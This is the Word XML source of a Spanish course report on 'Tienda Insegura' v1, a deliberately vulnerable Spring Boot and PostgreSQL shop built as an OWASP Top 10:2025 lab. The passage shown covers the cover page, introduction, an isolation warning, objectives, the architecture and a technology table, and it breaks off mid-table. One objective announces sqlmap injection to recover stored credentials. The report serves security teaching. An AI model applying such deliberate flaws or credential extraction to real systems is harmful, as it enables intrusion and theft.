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B2A4A"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORME TÉCNICO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Aplicación Web Intencionalmente Vulnerable — "Tienda Insegura" (v1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementación y guía de explotación basada en OWASP Top 10:2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="900"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack: Spring Boot 3.2.5 (Java 17) · PostgreSQL 16 · Docker Compose · Nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Entorno de laboratorio: Windows + Docker Desktop + PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Curso: Seguridad Informática — Proyecto OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Documento: Versión 1 — Aplicativo vulnerable (informe técnico + guía de despliegue y pentesting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha: agosto de 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>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2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introducción y contexto del aplicativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este documento describe la Versión 1 (v1) del proyecto "Tienda Insegura", una aplicación web de comercio electrónico desarrollada de forma intencional con fallas de seguridad, con el propósito de servir como laboratorio práctico para el estudio del OWASP Top 10:2025. La aplicación simula una tienda en línea funcional (catálogo de productos, registro e inicio de sesión, carrito de compras, checkout y un panel de administración) sobre la cual se implementaron, de manera deliberada y documentada en el propio código fuente, las diez categorías de riesgo del OWASP Top 10:2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El objetivo académico de esta v1 es doble: por un lado, demostrar cómo se ven estas vulnerabilidades en una aplicación real construida con un stack moderno (Spring Boot + PostgreSQL); por otro, servir de base para una Versión 2 (v2) saneada, en la que cada una de estas fallas se corrige aplicando las contramedidas estándar de la industria (sentencias preparadas, control de acceso basado en roles, cifrado de contraseñas, cabeceras de seguridad, HTTPS con TLS, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todo el código, la base de datos (scripts SQL) y la documentación de ambas versiones se entregan como parte del proyecto. Este informe cubre específicamente la v1: su contexto, arquitectura, cómo desplegarla en un entorno de laboratorio local mediante Docker (con comandos en PowerShell para Windows) y la guía paso a paso para reproducir y comprobar cada una de las 10 vulnerabilidades implementadas.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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Advertencia: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Este aplicativo contiene vulnerabilidades reales y explotables a propósito. Debe ejecutarse únicamente en un entorno local aislado (VM o contenedores en una máquina de laboratorio), nunca expuesto a redes públicas o a Internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo general</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementar y documentar una aplicación web vulnerable basada en las diez categorías del OWASP Top 10:2025, que permita practicar la identificación, explotación controlada y posterior corrección de vulnerabilidades de seguridad en un entorno de laboratorio reproducible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos específicos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Desplegar la aplicación en un entorno local basado en contenedores Docker, con una arquitectura similar a un escenario real (frontend, backend y base de datos separados).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentar la arquitectura de despliegue y las tecnologías empleadas en cada capa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Elaborar una guía de instalación y ejecución reproducible en Windows utilizando PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicar de forma clara el funcionamiento del backend (Spring Boot) y del frontend (HTML/CSS/JS) del aplicativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proveer una guía de pruebas de penetración que permita replicar y comprobar cada una de las 10 vulnerabilidades OWASP implementadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejecutar una prueba de SQL Injection automatizada con sqlmap que permita descubrir las credenciales de acceso almacenadas en la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Arquitectura de despliegue y tecnologías</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación sigue una arquitectura de tres capas desacopladas (frontend, backend, base de datos), orquestadas con Docker Compose para reproducir un escenario cercano a un despliegue real de microservicios ligero, todo dentro de una misma máquina host (equipo de laboratorio o VM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de arquitectura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r>
              <w:t>┌───────────────────────────────────────────────────────────────────┐</w:t>
              <w:br/>
              <w:t>│                    LABORATORIO LOCAL AISLADO                       │</w:t>
              <w:br/>
              <w:t>├───────────────────────────────────────────────────────────────────┤</w:t>
              <w:br/>
              <w:t>│                                                                   │</w:t>
              <w:br/>
              <w:t>│ Navegador                                                         │</w:t>
              <w:br/>
              <w:t>│     │ HTTP 127.0.0.1:3000                                        │</w:t>
              <w:br/>
              <w:t>│     ▼                                                             │</w:t>
              <w:br/>
              <w:t>│ ┌────────────────┐   /api y /actuator   ┌──────────────────────┐  │</w:t>
              <w:br/>
              <w:t>│ │ frontend Nginx │ ───────────────────► │ backend Spring Boot  │  │</w:t>
              <w:br/>
              <w:t>│ │ puerto 80      │   backend:8080       │ puerto 8080          │  │</w:t>
              <w:br/>
              <w:t>│ └────────────────┘                      └──────────┬───────────┘  │</w:t>
              <w:br/>
              <w:t>│                                                   │ JDBC          │</w:t>
              <w:br/>
              <w:t>│                                                   ▼               │</w:t>
              <w:br/>
              <w:t>│                                        ┌──────────────────────┐   │</w:t>
              <w:br/>
              <w:t>│                                        │ PostgreSQL 16        │   │</w:t>
              <w:br/>
              <w:t>│                                        │ puerto 5432          │   │</w:t>
              <w:br/>
              <w:t>│                                        └──────────────────────┘   │</w:t>
              <w:br/>
              <w:t>│                                                                   │</w:t>
              <w:br/>
              <w:t>│ Red interna: tienda_insegura_v1_lab                              │</w:t>
              <w:br/>
              <w:t>│ Publicación: solo 127.0.0.1                                      │</w:t>
              <w:br/>
              <w:t>└───────────────────────────────────────────────────────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnologías utilizadas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50"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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Capa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Tecnología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="455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Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>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HTML5, CSS3, JavaScript (vanilla)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Páginas estáticas servidas por Nginx; consumen la API REST vía fetch()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Java 17 + Spring Boot 3.2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">API REST, JWT propio (jjwt), JDBC directo (JdbcTemplate) para el módulo de búsqueda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>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PostgreSQL 16 (alpine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Esquema relacional: usuarios, categorías, productos, pedidos, pedido_items</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Contenedores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker + Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3 servicios: postgres, backend, frontend (perfil "full")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Proxy web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Nginx (imagen oficial alpine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4550"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sirve el frontend estático y hace proxy_pass de /api/ y /actuator/ al backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
